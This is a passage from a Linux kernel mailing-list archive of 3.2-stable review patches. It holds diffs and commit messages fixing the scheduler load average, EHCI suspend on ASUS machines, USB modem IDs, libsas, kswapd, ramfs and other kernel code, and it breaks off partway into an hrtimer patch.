+ * in order to minimize overhead.
+ *
+ * The global load average is an exponentially decaying average of nr_running +
+ * nr_uninterruptible.
+ *
+ * Once every LOAD_FREQ:
+ *
+ *   nr_active = 0;
+ *   for_each_possible_cpu(cpu)
+ * nr_active += cpu_of(cpu)->nr_running + cpu_of(cpu)->nr_uninterruptible;
+ *
+ *   avenrun[n] = avenrun[0] * exp_n + nr_active * (1 - exp_n)
+ *
+ * Due to a number of reasons the above turns in the mess below:
+ *
+ *  - for_each_possible_cpu() is prohibitively expensive on machines with
+ *serious number of cpus, therefore we need to take a distributed approach
+ *to calculating nr_active.
+ *
+ *\Sum_i x_i(t) = \Sum_i x_i(t) - x_i(t_0) | x_i(t_0) := 0
+ *  = \Sum_i { \Sum_j=1 x_i(t_j) - x_i(t_j-1) }
+ *
+ *So assuming nr_active := 0 when we start out -- true per definition, we
+ *can simply take per-cpu deltas and fold those into a global accumulate
+ *to obtain the same result. See calc_load_fold_active().
+ *
+ *Furthermore, in order to avoid synchronizing all per-cpu delta folding
+ *across the machine, we assume 10 ticks is sufficient time for every
+ *cpu to have completed this task.
+ *
+ *This places an upper-bound on the IRQ-off latency of the machine. Then
+ *again, being late doesn't loose the delta, just wrecks the sample.
+ *
+ *  - cpu_rq()->nr_uninterruptible isn't accurately tracked per-cpu because
+ *this would add another cross-cpu cacheline miss and atomic operation
+ *to the wakeup path. Instead we increment on whatever cpu the task ran
+ *when it went into uninterruptible state and decrement on whatever cpu
+ *did the wakeup. This means that only the sum of nr_uninterruptible over
+ *all cpus yields the correct result.
+ *
+ *  This covers the NO_HZ=n code, for extra head-aches, see the comment below.
+ */
+
 /* Variables and functions for calc_load */
 static atomic_long_t calc_load_tasks;
 static unsigned long calc_load_update;
 unsigned long avenrun[3];
-EXPORT_SYMBOL(avenrun);
+EXPORT_SYMBOL(avenrun); /* should be removed */
+
+/**
+ * get_avenrun - get the load average array
+ * @loads: pointer to dest load array
+ * @offset:offset to add
+ * @shift: shift count to shift the result left
+ *
+ * These values are estimates at best, so no need for locking.
+ */
+void get_avenrun(unsigned long *loads, unsigned long offset, int shift)
+{
+   loads[0] = (avenrun[0] + offset) << shift;
+   loads[1] = (avenrun[1] + offset) << shift;
+   loads[2] = (avenrun[2] + offset) << shift;
+}
 
 static long calc_load_fold_active(struct rq *this_rq)
 {
@@ -3422,6 +3483,9 @@ static long calc_load_fold_active(struct
return delta;
 }
 
+/*
+ * a1 = a0 * e + a * (1 - e)
+ */
 static unsigned long
 calc_load(unsigned

[ 037/108] PCI: EHCI: fix crash during suspend on ASUS computers

2012-07-22 Thread Ben Hutchings
3.2-stable review patch.  If anyone has any objections, please let me know.

--

From: Alan Stern 

commit dbf0e4c7257f8d684ec1a3c919853464293de66e upstream.

Quite a few ASUS computers experience a nasty problem, related to the
EHCI controllers, when going into system suspend.  It was observed
that the problem didn't occur if the controllers were not put into the
D3 power state before starting the suspend, and commit
151b61284776be2d6f02d48c23c3625678960b97 (USB: EHCI: fix crash during
suspend on ASUS computers) was created to do this.

It turned out this approach messed up other computers that didn't have
the problem -- it prevented USB wakeup from working.  Consequently
commit c2fb8a3fa25513de8fedb38509b1f15a5bbee47b (USB: add
NO_D3_DURING_SLEEP flag and revert 151b61284776be2) was merged; it
reverted the earlier commit and added a whitelist of known good board
names.

Now we know the actual cause of the problem.  Thanks to AceLan Kao for
tracking it down.

According to him, an engineer at ASUS explained that some of their
BIOSes contain a bug that was added in an attempt to work around a
problem in early versions of Windows.  When the computer goes into S3
suspend, the BIOS tries to verify that the EHCI controllers were first
quiesced by the OS.  Nothing's wrong with this, but the BIOS does it
by checking that the PCI COMMAND registers contain 0 without checking
the controllers' power state.  If the register isn't 0, the BIOS
assumes the controller needs to be quiesced and tries to do so.  This
involves making various MMIO accesses to the controller, which don't
work very well if the controller is already in D3.  The end result is
a system hang or memory corruption.

Since the value in the PCI COMMAND register doesn't matter once the
controller has been suspended, and since the value will be restored
anyway when the controller is resumed, we can work around the BIOS bug
simply by setting the register to 0 during system suspend.  This patch
(as1590) does so and also reverts the second commit mentioned above,
which is now unnecessary.

In theory we could do this for every PCI device.  However to avoid
introducing new problems, the patch restricts itself to EHCI host
controllers.

Finally the affected systems can suspend with USB wakeup working
properly.

Reference: https://bugzilla.kernel.org/show_bug.cgi?id=37632
Reference: https://bugzilla.kernel.org/show_bug.cgi?id=42728
Based-on-patch-by: AceLan Kao 
Signed-off-by: Alan Stern 
Tested-by: Dâniel Fraga 
Tested-by: Javier Marcet 
Tested-by: Andrey Rahmatullin 
Tested-by: Oleksij Rempel 
Tested-by: Pavel Pisa 
Acked-by: Bjorn Helgaas 
Acked-by: Rafael J. Wysocki 
Signed-off-by: Greg Kroah-Hartman 
Signed-off-by: Ben Hutchings 
---
 drivers/pci/pci-driver.c |   12 
 drivers/pci/pci.c|5 -
 drivers/pci/quirks.c |   26 --
 include/linux/pci.h  |2 --
 4 files changed, 12 insertions(+), 33 deletions(-)

diff --git a/drivers/pci/pci-driver.c b/drivers/pci/pci-driver.c
index bf0cee6..099f46c 100644
--- a/drivers/pci/pci-driver.c
+++ b/drivers/pci/pci-driver.c
@@ -748,6 +748,18 @@ static int pci_pm_suspend_noirq(struct device *dev)
 
pci_pm_set_unknown_state(pci_dev);
 
+   /*
+* Some BIOSes from ASUS have a bug: If a USB EHCI host controller's
+* PCI COMMAND register isn't 0, the BIOS assumes that the controller
+* hasn't been quiesced and tries to turn it off.  If the controller
+* is already in D3, this can hang or cause memory corruption.
+*
+* Since the value of the COMMAND register doesn't matter once the
+* device has been suspended, we can safely set it to 0 here.
+*/
+   if (pci_dev->class == PCI_CLASS_SERIAL_USB_EHCI)
+   pci_write_config_word(pci_dev, PCI_COMMAND, 0);
+
return 0;
 }
 
diff --git a/drivers/pci/pci.c b/drivers/pci/pci.c
index 77cb54a..447e834 100644
--- a/drivers/pci/pci.c
+++ b/drivers/pci/pci.c
@@ -1744,11 +1744,6 @@ int pci_prepare_to_sleep(struct pci_dev *dev)
if (target_state == PCI_POWER_ERROR)
return -EIO;
 
-   /* Some devices mustn't be in D3 during system sleep */
-   if (target_state == PCI_D3hot &&
-   (dev->dev_flags & PCI_DEV_FLAGS_NO_D3_DURING_SLEEP))
-   return 0;
-
pci_enable_wake(dev, target_state, device_may_wakeup(&dev->dev));
 
error = pci_set_power_state(dev, target_state);
diff --git a/drivers/pci/quirks.c b/drivers/pci/quirks.c
index 194b243a..2a75216 100644
--- a/drivers/pci/quirks.c
+++ b/drivers/pci/quirks.c
@@ -2929,32 +2929,6 @@ static void __devinit disable_igfx_irq(struct pci_dev 
*dev)
 DECLARE_PCI_FIXUP_FINAL(PCI_VENDOR_ID_INTEL, 0x0102, disable_igfx_irq);
 DECLARE_PCI_FIXUP_FINAL(PCI_VENDOR_ID_INTEL, 0x010a, disable_igfx_irq);
 
-/*
- * The Intel 6 Series/C200 Series chipset's EHCI controllers on many
- * ASUS motherboards will cause memory corrupt

[ 030/108] USB: option: Add MEDIATEK product ids

2012-07-22 Thread Ben Hutchings
3.2-stable review patch.  If anyone has any objections, please let me know.

--

From: Gaosen Zhang 

commit aacef9c561a693341566a6850c451ce3df68cb9a upstream.

Signed-off-by: Gaosen Zhang 
Signed-off-by: Greg Kroah-Hartman 
Signed-off-by: Ben Hutchings 
---
 drivers/usb/serial/option.c |   20 
 1 file changed, 20 insertions(+)

diff --git a/drivers/usb/serial/option.c b/drivers/usb/serial/option.c
index 167aed8..417ab1b 100644
--- a/drivers/usb/serial/option.c
+++ b/drivers/usb/serial/option.c
@@ -497,6 +497,15 @@ static void option_instat_callback(struct urb *urb);
 
 /* MediaTek products */
 #define MEDIATEK_VENDOR_ID 0x0e8d
+#define MEDIATEK_PRODUCT_DC_1COM   0x00a0
+#define MEDIATEK_PRODUCT_DC_4COM   0x00a5
+#define MEDIATEK_PRODUCT_DC_5COM   0x00a4
+#define MEDIATEK_PRODUCT_7208_1COM 0x7101
+#define MEDIATEK_PRODUCT_7208_2COM 0x7102
+#define MEDIATEK_PRODUCT_FP_1COM   0x0003
+#define MEDIATEK_PRODUCT_FP_2COM   0x0023
+#define MEDIATEK_PRODUCT_FPDC_1COM 0x0043
+#define MEDIATEK_PRODUCT_FPDC_2COM 0x0033
 
 /* Cellient products */
 #define CELLIENT_VENDOR_ID 0x2692
@@ -1246,6 +1255,17 @@ static const struct usb_device_id option_ids[] = {
{ USB_DEVICE_AND_INTERFACE_INFO(MEDIATEK_VENDOR_ID, 0x00a1, 0xff, 0x02, 
0x01) },
{ USB_DEVICE_AND_INTERFACE_INFO(MEDIATEK_VENDOR_ID, 0x00a2, 0xff, 0x00, 
0x00) },
{ USB_DEVICE_AND_INTERFACE_INFO(MEDIATEK_VENDOR_ID, 0x00a2, 0xff, 0x02, 
0x01) },/* MediaTek MT6276M modem & app port */
+   { USB_DEVICE_AND_INTERFACE_INFO(MEDIATEK_VENDOR_ID, 
MEDIATEK_PRODUCT_DC_1COM, 0x0a, 0x00, 0x00) },
+   { USB_DEVICE_AND_INTERFACE_INFO(MEDIATEK_VENDOR_ID, 
MEDIATEK_PRODUCT_DC_5COM, 0xff, 0x02, 0x01) },
+   { USB_DEVICE_AND_INTERFACE_INFO(MEDIATEK_VENDOR_ID, 
MEDIATEK_PRODUCT_DC_5COM, 0xff, 0x00, 0x00) },
+   { USB_DEVICE_AND_INTERFACE_INFO(MEDIATEK_VENDOR_ID, 
MEDIATEK_PRODUCT_DC_4COM, 0xff, 0x02, 0x01) },
+   { USB_DEVICE_AND_INTERFACE_INFO(MEDIATEK_VENDOR_ID, 
MEDIATEK_PRODUCT_DC_4COM, 0xff, 0x00, 0x00) },
+   { USB_DEVICE_AND_INTERFACE_INFO(MEDIATEK_VENDOR_ID, 
MEDIATEK_PRODUCT_7208_1COM, 0x02, 0x00, 0x00) },
+   { USB_DEVICE_AND_INTERFACE_INFO(MEDIATEK_VENDOR_ID, 
MEDIATEK_PRODUCT_7208_2COM, 0x02, 0x02, 0x01) },
+   { USB_DEVICE_AND_INTERFACE_INFO(MEDIATEK_VENDOR_ID, 
MEDIATEK_PRODUCT_FP_1COM, 0x0a, 0x00, 0x00) },
+   { USB_DEVICE_AND_INTERFACE_INFO(MEDIATEK_VENDOR_ID, 
MEDIATEK_PRODUCT_FP_2COM, 0x0a, 0x00, 0x00) },
+   { USB_DEVICE_AND_INTERFACE_INFO(MEDIATEK_VENDOR_ID, 
MEDIATEK_PRODUCT_FPDC_1COM, 0x0a, 0x00, 0x00) },
+   { USB_DEVICE_AND_INTERFACE_INFO(MEDIATEK_VENDOR_ID, 
MEDIATEK_PRODUCT_FPDC_2COM, 0x0a, 0x00, 0x00) },
{ USB_DEVICE(CELLIENT_VENDOR_ID, CELLIENT_PRODUCT_MEN200) },
{ } /* Terminating entry */
 };


--
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majord...@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html
Please read the FAQ at  http://www.tux.org/lkml/


[ 027/108] gpiolib: wm8994: Pay attention to the value set when enabling as output

2012-07-22 Thread Ben Hutchings
3.2-stable review patch.  If anyone has any objections, please let me know.

--

From: Mark Brown 

commit 8cd578b6e28693f357867a77598a88ef3deb6b39 upstream.

Not paying attention to the value being set is a bad thing because it
means that we'll not set the hardware up to reflect what was requested.
Not setting the hardware up to reflect what was requested means that the
caller won't get the results they wanted.

Signed-off-by: Mark Brown 
Signed-off-by: Linus Walleij 
Signed-off-by: Ben Hutchings 
---
 drivers/gpio/gpio-wm8994.c |5 -
 1 file changed, 4 insertions(+), 1 deletion(-)

diff --git a/drivers/gpio/gpio-wm8994.c b/drivers/gpio/gpio-wm8994.c
index 92ea535..aa61ad2 100644
--- a/drivers/gpio/gpio-wm8994.c
+++ b/drivers/gpio/gpio-wm8994.c
@@ -89,8 +89,11 @@ static int wm8994_gpio_direction_out(struct gpio_chip *chip,
struct wm8994_gpio *wm8994_gpio = to_wm8994_gpio(chip);
struct wm8994 *wm8994 = wm8994_gpio->wm8994;
 
+   if (value)
+   value = WM8994_GPN_LVL;
+
return wm8994_set_bits(wm8994, WM8994_GPIO_1 + offset,
-  WM8994_GPN_DIR, 0);
+  WM8994_GPN_DIR | WM8994_GPN_LVL, value);
 }
 
 static void wm8994_gpio_set(struct gpio_chip *chip, unsigned offset, int value)


--
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majord...@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html
Please read the FAQ at  http://www.tux.org/lkml/


[ 035/108] [SCSI] libsas: fix taskfile corruption in sas_ata_qc_fill_rtf

2012-07-22 Thread Ben Hutchings
3.2-stable review patch.  If anyone has any objections, please let me know.

--

From: Dan Williams 

commit 6ef1b512f4e6f936d89aa20be3d97a7ec7c290ac upstream.

fill_result_tf() grabs the taskfile flags from the originating qc which
sas_ata_qc_fill_rtf() promptly overwrites.  The presence of an
ata_taskfile in the sata_device makes it tempting to just copy the full
contents in sas_ata_qc_fill_rtf().  However, libata really only wants
the fis contents and expects the other portions of the taskfile to not
be touched by ->qc_fill_rtf.  To that end store a fis buffer in the
sata_device and use ata_tf_from_fis() like every other ->qc_fill_rtf()
implementation.

Reported-by: Praveen Murali 
Tested-by: Praveen Murali 
Signed-off-by: Dan Williams 
Signed-off-by: James Bottomley 
[bwh: Backported to 3.2: adjust context]
Signed-off-by: Ben Hutchings 
---
 drivers/scsi/aic94xx/aic94xx_task.c |2 +-
 drivers/scsi/libsas/sas_ata.c   |   12 ++--
 include/scsi/libsas.h   |6 --
 3 files changed, 11 insertions(+), 9 deletions(-)

--- a/drivers/scsi/aic94xx/aic94xx_task.c
+++ b/drivers/scsi/aic94xx/aic94xx_task.c
@@ -201,7 +201,7 @@ static void asd_get_response_tasklet(str
 
if (SAS_STATUS_BUF_SIZE >= sizeof(*resp)) {
resp->frame_len = le16_to_cpu(*(__le16 *)(r+6));
-   memcpy(&resp->ending_fis[0], r+16, 24);
+   memcpy(&resp->ending_fis[0], r+16, ATA_RESP_FIS_SIZE);
ts->buf_valid_size = sizeof(*resp);
}
}
--- a/drivers/scsi/libsas/sas_ata.c
+++ b/drivers/scsi/libsas/sas_ata.c
@@ -112,12 +112,12 @@ static void sas_ata_task_done(struct sas
if (stat->stat == SAS_PROTO_RESPONSE || stat->stat == SAM_STAT_GOOD ||
((stat->stat == SAM_STAT_CHECK_CONDITION &&
  dev->sata_dev.command_set == ATAPI_COMMAND_SET))) {
-   ata_tf_from_fis(resp->ending_fis, &dev->sata_dev.tf);
+   memcpy(dev->sata_dev.fis, resp->ending_fis, ATA_RESP_FIS_SIZE);
 
if (!link->sactive) {
-   qc->err_mask |= ac_err_mask(dev->sata_dev.tf.command);
+   qc->err_mask |= ac_err_mask(dev->sata_dev.fis[2]);
} else {
-   link->eh_info.err_mask |= 
ac_err_mask(dev->sata_dev.tf.command);
+   link->eh_info.err_mask |= 
ac_err_mask(dev->sata_dev.fis[2]);
if (unlikely(link->eh_info.err_mask))
qc->flags |= ATA_QCFLAG_FAILED;
}
@@ -138,8 +138,8 @@ static void sas_ata_task_done(struct sas
qc->flags |= ATA_QCFLAG_FAILED;
}
 
-   dev->sata_dev.tf.feature = 0x04; /* status err */
-   dev->sata_dev.tf.command = ATA_ERR;
+   dev->sata_dev.fis[3] = 0x04; /* status err */
+   dev->sata_dev.fis[2] = ATA_ERR;
}
}
 
@@ -252,7 +252,7 @@ static bool sas_ata_qc_fill_rtf(struct a
 {
struct domain_device *dev = qc->ap->private_data;
 
-   memcpy(&qc->result_tf, &dev->sata_dev.tf, sizeof(qc->result_tf));
+   ata_tf_from_fis(dev->sata_dev.fis, &qc->result_tf);
return true;
 }
 
--- a/include/scsi/libsas.h
+++ b/include/scsi/libsas.h
@@ -159,6 +159,8 @@ enum ata_command_set {
 ATAPI_COMMAND_SET = 1,
 };
 
+#define ATA_RESP_FIS_SIZE 24
+
 struct sata_device {
 enum   ata_command_set command_set;
 struct smp_resprps_resp; /* report_phy_sata_resp */
@@ -170,7 +172,7 @@ struct sata_device {
 
struct ata_port *ap;
struct ata_host ata_host;
-   struct ata_taskfile tf;
+   u8 fis[ATA_RESP_FIS_SIZE];
u32 sstatus;
u32 serror;
u32 scontrol;
@@ -486,7 +488,7 @@ enum exec_status {
  */
 struct ata_task_resp {
u16  frame_len;
-   u8   ending_fis[24];  /* dev to host or data-in */
+   u8   ending_fis[ATA_RESP_FIS_SIZE];   /* dev to host or data-in */
u32  sstatus;
u32  serror;
u32  scontrol;


--
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majord...@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html
Please read the FAQ at  http://www.tux.org/lkml/


[ 029/108] USB: option: add ZTE MF60

2012-07-22 Thread Ben Hutchings
3.2-stable review patch.  If anyone has any objections, please let me know.

--

From: Bjørn Mork  

commit 8e16e33c168a6efd0c9f7fa9dd4c1e1db9a74553 upstream.

Switches into a composite device by ejecting the initial
driver CD.  The four interfaces are: QCDM, AT, QMI/wwan
and mass storage.  Let this driver manage the two serial
interfaces:

T:  Bus=02 Lev=01 Prnt=01 Port=01 Cnt=01 Dev#= 28 Spd=480  MxCh= 0
D:  Ver= 2.00 Cls=00(>ifc ) Sub=00 Prot=00 MxPS=64 #Cfgs=  1
P:  Vendor=19d2 ProdID=1402 Rev= 0.00
S:  Manufacturer=ZTE,Incorporated
S:  Product=ZTE WCDMA Technologies MSM
S:  SerialNumber=x
C:* #Ifs= 4 Cfg#= 1 Atr=c0 MxPwr=500mA
I:* If#= 0 Alt= 0 #EPs= 2 Cls=ff(vend.) Sub=ff Prot=ff Driver=option
E:  Ad=81(I) Atr=02(Bulk) MxPS= 512 Ivl=0ms
E:  Ad=01(O) Atr=02(Bulk) MxPS= 512 Ivl=4ms
I:* If#= 1 Alt= 0 #EPs= 2 Cls=ff(vend.) Sub=ff Prot=ff Driver=option
E:  Ad=82(I) Atr=02(Bulk) MxPS= 512 Ivl=0ms
E:  Ad=02(O) Atr=02(Bulk) MxPS= 512 Ivl=4ms
I:* If#= 2 Alt= 0 #EPs= 3 Cls=ff(vend.) Sub=ff Prot=ff Driver=qmi_wwan
E:  Ad=83(I) Atr=03(Int.) MxPS=  64 Ivl=2ms
E:  Ad=84(I) Atr=02(Bulk) MxPS= 512 Ivl=0ms
E:  Ad=03(O) Atr=02(Bulk) MxPS= 512 Ivl=4ms
I:* If#= 3 Alt= 0 #EPs= 2 Cls=08(stor.) Sub=06 Prot=50 Driver=usb-storage
E:  Ad=04(O) Atr=02(Bulk) MxPS= 512 Ivl=0ms
E:  Ad=85(I) Atr=02(Bulk) MxPS= 512 Ivl=0ms

Signed-off-by: Bjørn Mork 
Signed-off-by: Greg Kroah-Hartman 
Signed-off-by: Ben Hutchings 
---
 drivers/usb/serial/option.c |6 ++
 1 file changed, 6 insertions(+)

diff --git a/drivers/usb/serial/option.c b/drivers/usb/serial/option.c
index adf8ce7..167aed8 100644
--- a/drivers/usb/serial/option.c
+++ b/drivers/usb/serial/option.c
@@ -554,6 +554,10 @@ static const struct option_blacklist_info 
net_intf1_blacklist = {
.reserved = BIT(1),
 };
 
+static const struct option_blacklist_info net_intf2_blacklist = {
+   .reserved = BIT(2),
+};
+
 static const struct option_blacklist_info net_intf3_blacklist = {
.reserved = BIT(3),
 };
@@ -1099,6 +1103,8 @@ static const struct usb_device_id option_ids[] = {
{ USB_DEVICE_AND_INTERFACE_INFO(ZTE_VENDOR_ID, 0x1298, 0xff, 0xff, 
0xff) },
{ USB_DEVICE_AND_INTERFACE_INFO(ZTE_VENDOR_ID, 0x1299, 0xff, 0xff, 
0xff) },
{ USB_DEVICE_AND_INTERFACE_INFO(ZTE_VENDOR_ID, 0x1300, 0xff, 0xff, 
0xff) },
+   { USB_DEVICE_AND_INTERFACE_INFO(ZTE_VENDOR_ID, 0x1402, 0xff, 0xff, 
0xff),
+   .driver_info = (kernel_ulong_t)&net_intf2_blacklist },
{ USB_DEVICE_AND_INTERFACE_INFO(ZTE_VENDOR_ID, 0x2002, 0xff,
  0xff, 0xff), .driver_info = (kernel_ulong_t)&zte_k3765_z_blacklist },
{ USB_DEVICE_AND_INTERFACE_INFO(ZTE_VENDOR_ID, 0x2003, 0xff, 0xff, 
0xff) },


--
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majord...@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html
Please read the FAQ at  http://www.tux.org/lkml/


[ 033/108] [media] dvb-core: Release semaphore on error path dvb_register_device()

2012-07-22 Thread Ben Hutchings
3.2-stable review patch.  If anyone has any objections, please let me know.

--

From: Santosh Nayak 

commit 82163edcdfa4eb3d74516cc8e9f38dd3d039b67d upstream.

There is a missing "up_write()" here. Semaphore should be released
before returning error value.

Signed-off-by: Santosh Nayak 
Signed-off-by: Mauro Carvalho Chehab 
Signed-off-by: Ben Hutchings 
---
 drivers/media/dvb/dvb-core/dvbdev.c |1 +
 1 file changed, 1 insertion(+)

diff --git a/drivers/media/dvb/dvb-core/dvbdev.c 
b/drivers/media/dvb/dvb-core/dvbdev.c
index 00a6732..39eab73 100644
--- a/drivers/media/dvb/dvb-core/dvbdev.c
+++ b/drivers/media/dvb/dvb-core/dvbdev.c
@@ -243,6 +243,7 @@ int dvb_register_device(struct dvb_adapter *adap, struct 
dvb_device **pdvbdev,
if (minor == MAX_DVB_MINORS) {
kfree(dvbdevfops);
kfree(dvbdev);
+   up_write(&minor_rwsem);
mutex_unlock(&dvbdev_register_lock);
return -EINVAL;
}


--
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majord...@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html
Please read the FAQ at  http://www.tux.org/lkml/


[ 042/108] fs: ramfs: file-nommu: add SetPageUptodate()

2012-07-22 Thread Ben Hutchings
3.2-stable review patch.  If anyone has any objections, please let me know.

--

From: Bob Liu 

commit fea9f718b3d68147f162ed2d870183ce5e0ad8d8 upstream.

There is a bug in the below scenario for !CONFIG_MMU:

 1. create a new file
 2. mmap the file and write to it
 3. read the file can't get the correct value

Because

  sys_read() -> generic_file_aio_read() -> simple_readpage() -> clear_page()

which causes the page to be zeroed.

Add SetPageUptodate() to ramfs_nommu_expand_for_mapping() so that
generic_file_aio_read() do not call simple_readpage().

Signed-off-by: Bob Liu 
Cc: Hugh Dickins 
Cc: David Howells 
Cc: Geert Uytterhoeven 
Cc: Greg Ungerer 
Signed-off-by: Andrew Morton 
Signed-off-by: Linus Torvalds 
Signed-off-by: Ben Hutchings 
---
 fs/ramfs/file-nommu.c |1 +
 1 file changed, 1 insertion(+)

diff --git a/fs/ramfs/file-nommu.c b/fs/ramfs/file-nommu.c
index fbb0b47..d5378d0 100644
--- a/fs/ramfs/file-nommu.c
+++ b/fs/ramfs/file-nommu.c
@@ -110,6 +110,7 @@ int ramfs_nommu_expand_for_mapping(struct inode *inode, 
size_t newsize)
 
/* prevent the page from being discarded on memory pressure */
SetPageDirty(page);
+   SetPageUptodate(page);
 
unlock_page(page);
put_page(page);


--
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majord...@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html
Please read the FAQ at  http://www.tux.org/lkml/


[ 052/108] atl1c: fix issue of transmit queue 0 timed out

2012-07-22 Thread Ben Hutchings
3.2-stable review patch.  If anyone has any objections, please let me know.

--

From: Cloud Ren 

commit b94e52f62683dc0b00c6d1b58b80929a078c0fd5 upstream.

some people report atl1c could cause system hang with following
kernel trace info:
---
WARNING: at.../net/sched/sch_generic.c:258 dev_watchdog+0x1db/0x1d0()
...
NETDEV WATCHDOG: eth0 (atl1c): transmit queue 0 timed out
...
---
This is caused by netif_stop_queue calling when cable Link is down.
So remove netif_stop_queue, because link_watch will take it over.

Signed-off-by: xiong 
Signed-off-by: Cloud Ren 
Signed-off-by: David S. Miller 
[bwh: Backported to 3.2: adjust context]
Signed-off-by: Ben Hutchings 
---
 drivers/net/ethernet/atheros/atl1c/atl1c_main.c |1 -
 1 file changed, 1 deletion(-)

--- a/drivers/net/ethernet/atheros/atl1c/atl1c_main.c
+++ b/drivers/net/ethernet/atheros/atl1c/atl1c_main.c
@@ -267,7 +267,6 @@ static void atl1c_check_link_status(stru
dev_warn(&pdev->dev, "stop mac failed\n");
atl1c_set_aspm(hw, false);
netif_carrier_off(netdev);
-   netif_stop_queue(netdev);
atl1c_phy_reset(hw);
atl1c_phy_init(&adapter->hw);
} else {


--
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majord...@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html
Please read the FAQ at  http://www.tux.org/lkml/


[ 063/108] mm: fix lost kswapd wakeup in kswapd_stop()

2012-07-22 Thread Ben Hutchings
3.2-stable review patch.  If anyone has any objections, please let me know.

--

From: Aaditya Kumar 

commit 1c7e7f6c0703d03af6bcd5ccc11fc15d23e5ecbe upstream.

Offlining memory may block forever, waiting for kswapd() to wake up
because kswapd() does not check the event kthread->should_stop before
sleeping.

The proper pattern, from Documentation/memory-barriers.txt, is:

   ---  waker  ---
   event_indicated = 1;
   wake_up_process(event_daemon);

   ---  sleeper  ---
   for (;;) {
  set_current_state(TASK_UNINTERRUPTIBLE);
  if (event_indicated)
 break;
  schedule();
   }

   set_current_state() may be wrapped by:
  prepare_to_wait();

In the kswapd() case, event_indicated is kthread->should_stop.

  === offlining memory (waker) ===
   kswapd_stop()
  kthread_stop()
 kthread->should_stop = 1
 wake_up_process()
 wait_for_completion()

  ===  kswapd_try_to_sleep (sleeper) ===
   kswapd_try_to_sleep()
  prepare_to_wait()
   .
   .
  schedule()
   .
   .
  finish_wait()

The schedule() needs to be protected by a test of kthread->should_stop,
which is wrapped by kthread_should_stop().

Reproducer:
   Do heavy file I/O in background.
   Do a memory offline/online in a tight loop

Signed-off-by: Aaditya Kumar 
Acked-by: KOSAKI Motohiro 
Reviewed-by: Minchan Kim 
Acked-by: Mel Gorman 
Signed-off-by: Andrew Morton 
Signed-off-by: Linus Torvalds 
Signed-off-by: Ben Hutchings 
---
 mm/vmscan.c |5 -
 1 file changed, 4 insertions(+), 1 deletion(-)

diff --git a/mm/vmscan.c b/mm/vmscan.c
index 6615763..66e4310 100644
--- a/mm/vmscan.c
+++ b/mm/vmscan.c
@@ -2688,7 +2688,10 @@ static void kswapd_try_to_sleep(pg_data_t *pgdat, int 
order, int classzone_idx)
 * them before going back to sleep.
 */
set_pgdat_percpu_threshold(pgdat, calculate_normal_threshold);
-   schedule();
+
+   if (!kthread_should_stop())
+   schedule();
+
set_pgdat_percpu_threshold(pgdat, calculate_pressure_threshold);
} else {
if (remaining)


--
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majord...@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html
Please read the FAQ at  http://www.tux.org/lkml/


[ 059/108] target: Clean up returning errors in PR handling code

2012-07-22 Thread Ben Hutchings
3.2-stable review patch.  If anyone has any objections, please let me know.

--

From: Roland Dreier 

commit d35212f3ca3bf4fb49d15e37f530c9931e2d2183 upstream.

 - instead of (PTR_ERR(file) < 0) just use IS_ERR(file)
 - return -EINVAL instead of EINVAL
 - all other error returns in target_scsi3_emulate_pr_out() use
   "goto out" -- get rid of the one remaining straight "return."

Signed-off-by: Roland Dreier 
Signed-off-by: Nicholas Bellinger 
Signed-off-by: Ben Hutchings 
---
 drivers/target/target_core_pr.c |7 ---
 1 file changed, 4 insertions(+), 3 deletions(-)

diff --git a/drivers/target/target_core_pr.c b/drivers/target/target_core_pr.c
index 8556499..a1bcd92 100644
--- a/drivers/target/target_core_pr.c
+++ b/drivers/target/target_core_pr.c
@@ -2031,7 +2031,7 @@ static int __core_scsi3_write_aptpl_to_file(
if (IS_ERR(file) || !file || !file->f_dentry) {
pr_err("filp_open(%s) for APTPL metadata"
" failed\n", path);
-   return (PTR_ERR(file) < 0 ? PTR_ERR(file) : -ENOENT);
+   return IS_ERR(file) ? PTR_ERR(file) : -ENOENT;
}
 
iov[0].iov_base = &buf[0];
@@ -3818,7 +3818,7 @@ int target_scsi3_emulate_pr_out(struct se_cmd *cmd)
" SPC-2 reservation is held, returning"
" RESERVATION_CONFLICT\n");
cmd->scsi_sense_reason = TCM_RESERVATION_CONFLICT;
-   ret = EINVAL;
+   ret = -EINVAL;
goto out;
}
 
@@ -3828,7 +3828,8 @@ int target_scsi3_emulate_pr_out(struct se_cmd *cmd)
 */
if (!cmd->se_sess) {
cmd->scsi_sense_reason = TCM_LOGICAL_UNIT_COMMUNICATION_FAILURE;
-   return -EINVAL;
+   ret = -EINVAL;
+   goto out;
}
 
if (cmd->data_length < 24) {


--
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majord...@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html
Please read the FAQ at  http://www.tux.org/lkml/


[ 083/108] hrtimer: Update hrtimer base offsets each hrtimer_interrupt

2012-07-22 Thread Ben Hutchings
3.2-stable review patch.  If anyone has any objections, please let me know.

--

From: John Stultz 

commit 5baefd6d84163443215f4a99f6a20f054ef11236 upstream.

The update of the hrtimer base offsets on all cpus cannot be made
atomically from the timekeeper.lock held and interrupt disabled region
as smp function calls are not allowed there.

clock_was_set(), which enforces the update on all cpus, is called
either from preemptible process context in case of do_settimeofday()
or from the softirq context when the offset modification happened in
the timer interrupt itself due to a leap second.

In both cases there is a race window for an hrtimer interrupt between
dropping timekeeper lock, enabling interrupts and clock_was_set()
issuing the updates. Any interrupt which arrives in that window will
see the new time but operate on stale offsets.

